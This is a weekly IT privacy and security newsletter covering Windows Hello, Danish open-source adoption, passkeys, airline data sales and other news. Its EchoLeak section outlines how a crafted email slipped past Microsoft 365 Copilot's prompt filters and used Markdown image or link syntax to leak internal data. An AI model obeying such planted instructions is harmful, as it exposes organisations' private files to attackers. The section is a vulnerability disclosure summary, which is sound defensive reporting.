Broken Windows. The IT Privacy and Security Weekly Update for the Week Ending June 17th., 2025

 EP 247.

In this update, Microsoft has updated Windows Hello to require both infrared and color cameras for facial authentication, improving security by addressing a spoofing vulnerability, though it now requires visible lighting. This increases biometric reliability and inconvenience to users in low-light settings. Consider exploring alternative operating systems like Linux for flexible authentication options.  

Aim Labs identified and helped patch 'EchoLeak,' a zero-click vulnerability in Microsoft 365 Copilot that risked data exfiltration via malicious emails, highlighting the need for stonking great AI guardrails.

Denmark is shifting from Microsoft Office and Windows to LibreOffice and Linux to enhance digital sovereignty and reduce reliance on foreign technology, driven by security, economic, and geopolitical priorities.

Chinese AI companies are bypassing U.S. chip export controls by processing data in third countries like Malaysia, using suitcases of hard drives to transport AI-training data.

Mattel has teamed up with OpenAI to develop AI-enhanced toys, promising safe, engaging, and age-appropriate experiences, with the first product set to launch later this year.

Apple’s new passkey import/export feature, built on FIDO Alliance standards, enables secure credential transfers across platforms, boosting interoperability while maintaining biometric security.

This advances user convenience and cross-ecosystem flexibility.  Now you can adopt passkeys to streamline secure authentication across your devices and platforms.  

A data broker owned by major U.S. airlines sold passenger flight data to DHS, prompting privacy concerns as agencies track travel without disclosing data sources.

WhatsApp will begin displaying ads in its Updates section, using limited user data like location for targeting, while preserving end-to-end encryption for chats and messages.

INTERPOL’s Operation Secure dismantled over 20,000 malicious IPs linked to 69 malware variants, arresting 32 suspects and seizing significant data to curb phishing and fraud.

Let's get to the detail.

Global: Windows Hello Face Unlock No Longer Works in the Dark and Microsoft Says It's Not a Bug

https://www.windowscentral.com/software-apps/windows-11/windows-hello-face-unlock-no-longer-works-in-the-dark-and-microsoft-says-its-not-a-bug

Microsoft has disabled Windows Hello's ability to authenticate users in low-light environments through a recent security update that now requires both infrared sensors and color cameras to verify faces.

The change forces the system to see a visible face through the webcam before completing authentication with IR sensors.

Windows Hello earlier relied solely on infrared sensors to create 3D facial scans, allowing the feature to work in complete darkness similar to iPhone's Face ID.

Microsoft pushed the dual-camera requirement to address a spoofing vulnerability in the biometric system.

So what's the upshot for you?

No more working in the dark for Windows users.  Broken Windows

Could this present another opportunity to move to Linux? (tinkle of glass)

Global: Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot

https://www.aim.security/lp/aim-labs-echoleak-blogpost

Aim Labs has uncovered EchoLeak, a critical 'zero-click' vulnerability in Microsoft 365 Copilot that allows data to be stolen automatically—just by receiving a malicious email—without any user interaction.

The flaw exploits a new 'LLM Scope Violation,' enabling external attacker prompts to reach into private organizational data that Copilot accesses via Microsoft Graph.

The attack uses a subtly crafted email to bypass Microsoft's prompt filters, embedding instructions aimed at the human recipient rather than the AI, which tricks Copilot into executing commands.

Then, leveraging Markdown image or link syntax, Copilot inadvertently sends proprietary data—automatically exposing details without requiring a click.

Researchers demonstrated that Copilot's integration lets it access emails, OneDrive, SharePoint, Teams chat logs, and more.

EchoLeak can exfiltrate this data silently using legitimate Microsoft services as proxies, dodging link-security safeguards.

This is the first weaponizable zero-click exploit in a widely used AI agent—no user behavior or interruption needed.

Microsoft has since patched the vulnerability (CVE-2025-32711), and Aim Labs worked with their MSRC to disclose and fix it.

So what's the upshot for you?

This research shines a light on a deeper issue: many AI agents that combine external inputs with internal data may be vulnerable unless guardrails specifically target these LLM Scope Violations.

And that is sometimes very hard to do.

DK: Denmark Is Dumping Microsoft Office and Windows For LibreOffice and Linux

https://www.zdnet.com/article/why-denmark-is-dumping-microsoft-office-and-windows-for-libreoffice-and-linux/

Denmark's Minister of Digitalization, Caroline Stage, has announced that the Danish government will start moving away from Microsoft Office to LibreOffice.

Why?

It's not because open-source is better, although I would argue that it is, but because Denmark wants to claim 'digital sovereignty.'

In the States, you probably haven't heard that phrase, but in the European Union, digital sovereignty is a big deal and getting bigger.

A combination of security, economic, political, and societal imperatives is driving the EU's digital sovereignty moves.

EU leaders are seeking to reduce Europe's dependence on foreign technology providers, primarily those from the United States, and to assert greater control over its digital infrastructure, data, and technological future.

Why?

Because they're concerned about who controls European data, who sets the rules, and who can potentially cut off access to essential services in ti

mes of geopolitical tension.

'Money issues have also played a decisive role,' writes ZDNet's Steven Vaughan-Nichols.

'Copenhagen's Microsoft software bill has soared from 313 million kroner in 2018 to 538 million kroner -- about $53 million in 2023, a 72% increase in just five years.'

David Heinemeier Hansson (DHH), a Dane, inventor of Ruby on Rails, and co-owner of the software developer company 37Signals, has said: 'Denmark is one of the most highly digitalized countries in the world.'

It's also one of the most Microsoft-dependent.

In fact, Microsoft is by far and away the single biggest dependency, so it makes perfect sense to start the quest for digital sovereignty there.

So what's the upshot for you?

Could this be in response to The US's protectionism?

No one is saying that outright, but depending on an OS and a work suite from a single company in a country that can't determine if they are going to slap tariffs on their trading partners from one week to the next could provide incentive.

The good news is that we have been using Linux and Libre Office for years and we think you too would be impressed!

CN: Chinese AI Companies Dodge US Chip Curbs Flying Suitcases of Hard Drives Abroad

https://www.tovima.com/wsj/chinese-ai-companies-dodge-u-s-chip-curbs-by-flying-suitcases-of-hard-drives-abroad/#:~:text=KUALA%20LUMPUR%2C%20Malaysia%E2%80%94In%20early,training%20an%20artificial-intelligence%20model.

Four Chinese AI engineers recently flew to Kuala Lumpur from Beijing, each carrying around 80 TB of AI-training data on hard drives—hand-cuffed onto four suitcases.

There, their firm rented ~300 Nvidia chip-powered servers, processed the data, then brought back trained model files—avoiding U.S. restrictions on exporting high-end chips into China.

U.S. export controls, tightened since 2022, have limited China's access to top-tier AI chips.

But Chinese firms have adapted—sometimes using domestic chips and other times rerouting models or hardware via third countries.

These toy-and-plane tactics rely on Malaysian and Middle Eastern data-centers, where U.S. oversight is lighter.

Firms even set up local shell entities to skirt scrutiny.

In response, U.S. regulators floated 'country-caps' on chip exports to block backdoor access—then dropped them, opting instead to pressure companies like Nvidia to police end-uses.

So what's the upshot for you?

Sales of Samsonite suitcases are said to be skyrocketing in some provinces of China as the demand for clandestine AI training takes offshore.

Global: Barbie goes AI as Mattel teams with OpenAI to reinvent playtime with artificial intelligence

https://nerds.xyz/barbie-goes-ai-as-mattel-teams-with-openai-to-reinvent-playtime-with-artificial-intelligence/

Barbie is getting a brain upgrade.

Mattel has officially partnered with OpenAI in a move that brings artificial intelligence to the toy aisle.

Yes, you read that right, folks.

Barbie might soon be chatting with your kids in full sentences, powered by ChatGPT.

Mattel says the first product from this partnership will be revealed later this year.

No word yet on whether that product will be Barbie, Hot Wheels, or some AI-powered Magic 8-Ball that gives sarcastic answers.

This collaboration brings OpenAI's advanced tools into Mattel's ecosystem of toys and entertainment brands.

The goal?

To launch AI-powered experiences that are fun, safe, and age-appropriate.

Mattel says it wants to keep things magical while also respecting privacy and security.

So what's the upshot for you?

Mattel says the first product from this partnership will be revealed later this year.

No word yet on whether it will be Barbie, Hot Wheels, or.... some AI-powered Magic 8-Ball that gives sarcastic answers.

Sorry.

Global: Apple Previews New Import/Export Feature To Make Passkeys More Interoperable

https://arstechnica.com/security/2025/06/apple-previews-new-import-export-feature-to-make-passkeys-more-interoperable/

Apple just revealed a new passkey import/export feature at WWDC—powered by the FIDO Alliance—to bridge the gap between different platforms and password managers.

Until now, once stored in an Apple device via iCloud, passkeys were locked in, making it tricky to switch ecosystems.

The secure system lets users initiate encrypted transfers directly between apps or OSes.

It replaces risky CSV/JSON exports with face-ID-protected sharing, ensuring no unencrypted files are left on disk.

It also works for other credentials like passwords and two-factor codes.

Built on a standardized data schema from FIDO, it's supported across iOS, macOS, iPadOS, and visionOS—and marks a big step toward true interoperability.

That means the passkeys you create can now follow you anywhere, not just within Apple's world.

Early reaction highlights both convenience and security wins—but some worry it compromises device-binding protections by making passkeys easier to move.

Apple insists transfers still demand local biometric or PIN authentication, keeping safety front and center.

So what's the upshot for you?

The non-interoperability of passkeys was a deterrent for those working across ecosystems.

This goes a long way towards instilling confidence that Passkeys are a viable solution.

US: Airlines Don't Want You to Know They Sold Your Flight Data to DHS

https://www.404media.co/airlines-dont-want-you-to-know-they-sold-your-flight-data-to-dhs/

A data broker owned by the country's major airlines, including Delta, American Airlines, and United, collected U.S. travellers' domestic flight records, sold access to them to Customs and Border Protection (CBP), and then as part of the contract told CBP to not reveal where the data came from.

The data includes passenger names, their full flight itineraries, and financial details.

CBP, a part of the Department of Homeland Security (DHS), says it needs this data to support state and local police to track people of interest's air travel across the country, in a purchase that has alarmed civil liberties experts.

The documents reveal for the first time in detail why at least one part of DHS purchased such information, and comes after Immigration and Customs Enforcement (ICE) detailed its own purchase of the data.

The documents also show for the first time that the data broker, called the Airlines Reporting Corporation (ARC), tells government agencies not to mention where it sourced the flight data from.

'The big airlines -- through a shady data broker that they own called ARC -- are selling the government bulk access to Americans' sensitive information, revealing where they fly and the credit card they used,' Senator Ron Wyden said in a statement.

ARC is owned and operated by at least eight major U.S. airlines, other publicly released documents show.

The company's board of directors include: representatives from Delta, Southwest, United, American Airlines, Alaska Airlines, JetBlue, and European airlines Lufthansa and Air France, and Canada's Air Canada.

More than 240 airlines depend on ARC for ticket settlement services.

So what's the upshot for you?

Another significant privacy infraction revealed.

Things are beginning to feel very wrong 'In the land of the free and the home of the brave.'

Global: WhatsApp Introduces Ads in Its App

https://www.nytimes.com/2025/06/16/technology/whatsapp-ads.html

When Facebook bought WhatsApp for $19 billion in 2014, the messaging app had a clear focus.

No ads, no games and no gimmicks.

For years, that is what WhatsApp's two billion users -- many of them in Brazil, India and other countries around the world -- got.

They chatted with friends and family unencumbered by advertising and other features found on social media.

Now that is set to change.

On Monday, WhatsApp said it would start showing ads inside its app for the first time.

The promotions will appear only in an area of the app called Updates, which is used by around 1.5 billion people a day.

WhatsApp will collect some data on users to target the ads, such as location and the device's default language, but it will not touch the contents of messages or whom users speak with.

The company added that it had no plans to place ads in chats and personal messages.

So what's the upshot for you?

In-app ads are a significant change from WhatsApp's original philosophy.

Jan Koum and Brian Acton, who founded WhatsApp in 2009, were committed to building a simple and quick way for friends and family to communicate with end-to-end encryption, a method of keeping texts, photos, videos and phone calls inaccessible by third parties.

Both left the company seven years ago.

Since then, Mark Zuckerberg, the chief executive of Facebook, now Meta, has focused on WhatsApp's growth and user privacy while also melding the app into the company's other products, including Instagram and Messenger.

EU: INTERPOL Dismantles 20,000+ Malicious IPs Linked to 69 Malware Variants in Operation Secure

https://thehackernews.com/2025/06/interpol-dismantles-20000-malicious-ips.html

INTERPOL led a global operation, 'Operation Secure,' from January to April 2025.

Together with 26 countries, they dismantled over 20,000 malicious IPs and domains tied to 69 info-stealing malware strains.

The operation shut down 79% of targeted hosts, seized 41 servers and 100 GB of stolen data, and arrested 32 suspects.

Notably, 18 arrests occurred in Vietnam, 12 in Sri Lanka, and 2 in Nauru.

Hong Kong police uncovered 117 command-and-control servers across 89 ISPs.

These were used to coordinate phishing, fraud, and social-media scams.

Firms like Group-IB, Trend Micro, and Kaspersky shared malware intel.

They helped trace infostealer families such as Lumma, Vidar, and Rhadamanthys, which harvest sensitive credentials and facilitate later attacks.

So what's the upshot for you?

Information-stealers often serve as entry tools for larger hacks—ransomware, business email compromise, financial fraud, so this is a win for us all.

We shared an update packed week with you we covered.....

The updated Windows Hello Face Unlock now requires both infrared and color cameras, prioritizing security but limiting low-light functionality.

It might be time to explore alternative OS's and authentication solutions to balance convenience and protection.

The patched 'EchoLeak' vulnerability in Microsoft 365 Copilot highlights the need for way better AI security to prevent data exfiltration.  A huge part of IA security will be to regularly update AI tools and monitor for vulnerabilities to ensure data protection.

Denmark’s transition to LibreOffice and Linux emphasizes digital sovereignty and cost savings through open-source adoption.  Consider open-source alternatives to enhance control over your digital infrastructure.

Chinese AI firms bypass U.S. chip curbs by processing data abroad, showcasing adaptability under regulatory constraints.  It might be time to invest in suitcase shares.

Mattel’s partnership with OpenAI for AI-powered toys promises engaging play but requires strong privacy safeguards.  Probably best to buy you kids next AI toy on the Zero trust model.  So far the toy manufactures have only been good at collecting all the data on your kid possible, and then losing it.

Apple’s new passkey import/export feature enhances cross-platform security and user convenience.  We'll believe it when we see it, but this is the passkey nirvana we have been waiting for.

Airlines’ sale of flight data to DHS via a data broker raises significant privacy concerns for travelers.  Cars, planes and trains.  OK we have not caught the railroads doing this yet, but stay tuned!

WhatsApp’s introduction of targeted ads in its Updates section shifts user experience while preserving message privacy.  We suggested you go Signal or Session years ago, so don't complain if silly ads start turning up in your What's App feeds.

INTERPOL’s Operation Secure dismantled malware networks, strengthening global cybersecurity against phishing and fraud.  It's a small win, but it won't last long.  The baddies will be back, so keep sharp and keep reading the update and listening to the podcasts!

And our quote of the week - "Discipline is the bridge between goals and accomplishment" -J. Rohn

That's it for this week, stay safe, stay secure, leave a comment on the podcast, share it with a friend, and we'll see you in se7en!